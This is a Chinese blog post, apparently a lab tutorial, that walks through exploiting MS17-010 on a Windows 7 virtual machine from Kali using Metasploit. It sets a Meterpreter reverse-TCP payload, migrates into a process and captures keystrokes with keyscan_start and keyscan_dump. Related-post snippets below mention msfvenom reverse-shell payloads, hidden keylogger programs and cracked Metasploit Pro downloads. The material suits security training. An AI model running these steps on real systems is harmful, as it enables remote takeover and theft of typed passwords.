渗透测试基础——MSF键盘监听

已于 2024-11-24 21:26:18 修改
阅读量414 收藏
点赞数 3
CC 4.0 BY-SA版权
文章标签: 安全
于 2024-11-24 14:25:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/g90900/article/details/144006777

①打开虚拟机客户端,需要把 win7 和 kali 设置同一网络模式下

②打开 win7 和 kali,在 cmd 终端用 ipconfig win7 IP,再kali 中用ifconfig查看IP,IP 就是系统的身份证

③确认好 IP 地址后,打开 kali 终端,输入 su root 进入 root 用户

④在 root 用户端输入 msfconsole 进入攻击框架

⑤输入指令search ms17-010搜索 msfconsole 攻击框架下的漏洞载荷

⑥用 use 0 选择漏洞载荷,用 set payload 设置攻击载荷 命令为:set payload windows/x64/meterpreter/reverse_tcp,设置受害者还攻击者 ip.命令为:set rhost ip 受害者 set lhost ip 攻击者

⑦查看设置 命令为:show options

⑧开始攻击,命令为:run

⑨查看进程,命令为:ps

⑩获取进程 PID,命令为:migrate -P PID,

   开始键盘监听,命令为:keyscan_start

   获取键盘监听内容,命令为:keyscan_dump

g90900
关注
【神兵利器】——190、MSF持续监听
Fly_鹏程万里
10-16 187
基本介绍。
KALI用MSF监听Windows7
weixin_60689826的博客
08-23 1198
利用MSF监听WIN7
GUI编程之键盘监听
我不想读研的博客
08-01 270
GUI编程之键盘监听 package com.zhang.lesson03; import java.awt.*; import java.awt.event.KeyAdapter; import java.awt.event.KeyEvent; public class TestKeyListener { public static void main(String[] args) { new KeyFrame(); } } class KeyFrame extends
msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听
weixin_53884648的博客
10-11 5353
利用msfconsole进行永恒之蓝漏洞攻击,并且使用msfvonom进行Windows木马生成,之后通过msf把木马上传到目标机器,使用msf监听模块进行后渗透权限维持。
[MSF]server/capture/http_javascript_keylogger键盘记录
weixin_33943347的博客
09-09 141
server/capture/http_javascript_keylogger DEMO使用的官方的效果图: 使用方法: show options 看看 msf auxiliary(server/capture/http_javascript_keylogger) > options Module options (auxiliary/server/capt...
渗透测试工具——Metasploit
热门推荐
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
网络安全渗透测试——名词解释
weixin_43778463的博客
10-12 3949
常用术语解释
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4867
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
msfvenom-shll生成工具是msf 组件——Metasploit(MSF)使用详解
代码审计
04-22 2670
抽离 专职生成对应的payload异或编码 -e x86/shikata_ga_nai -i 3linux 生成 payloadphp 生成 payloadpython 生成 payloadwindows 生产payload 抽离 专职生成对应的payload 异或 编码 免杀 msfvenom -l platforms 支持平台 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f
《黑客秘笈——渗透测试实用指南》读书笔记(1)
ShirlyTL的博客
12-20 6123
渗透学习 1.1搭建测试环境 Linux和 Windows兼备   1.2建立一个域   1.3建立其他服务器 Metasploitable2(一个优秀的 Ubuntu Linux虚拟机) 下载地址:http://sourceforge.net/projects/metasploitable/files/Metasploitable2   OWASPBWA(漏洞网站多) ht
键盘监听
11-25
该程序由python生成,运行该程序,会监听键盘的操作,并记录到txt文件。txt文件存在程序的运行目录下。
键盘监听程序
08-01
该程序,通过vb编写,双击图标运行后没有窗体,窗体默认为隐藏,能够监听键盘按键,当然在运行过程中,安全软件会有安全警示。当然你也可以测试监听效果,双击运行程序,然后敲击键盘,虽然默认运行时窗体是隐藏的,但在任务管理器中应用程序选项卡中可以看到名为工程1的程序再运行,点击结束任务即可。注意不是结束record.exe进程,而是在结束工程1程序。然后打开d盘的getkey.txt文件查看监听效果。
键盘输入监控
04-19
该软件是使用钩子拦截键盘输入,并把内容保存在C:\LogS.txt中,当然可以知道输入的密码了。
2024年小白必学:msf基本使用_msf监听(1),2024年最新浅谈网络安全消息机制原理
最新发布
2301_77121488的博客
05-11 868
网络安全很多技术干货,都可以共享给你们,如果你肯花时间沉下心去学习,它们一定能帮到你网络安全工程师学习资料包循序渐进地对黑客攻防剖析。适合不同层次的粉丝。我希望能为大家提供切实的帮助,讲解通俗易懂,风趣幽默,风格清新活泼,学起来轻松自如,酣畅淋漓!如果你想要入坑黑客&网络安全工程师,这份282G全网最全的网络安全资料包!网络安全大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享👉网安(嘿客红蓝对抗)所有方向的学习路线👈对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
Msfvenom建立后门程序指令及开启监听
Dreamsi_zhang的博客
08-13 1万+
一、场景介绍
使用msf监听模块接收反弹shell
-
05-23 3567
msf
msf基本使用(小白必看)
m0_55177391的博客
10-19 972
msf基本使用
键盘监听
疯了的驴
02-25 1145
组件事件监听:主类继承ActionListener并实现actionPerformed(ActionEvent e) 方法(e.getActionCommand().equals()……,),当然可以单独写一个自定义监听类(如面板类)继承ActionListener并实现actionPerformed(ActionEvent e)方法 组件(如按钮an1):an1.addActionListene
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值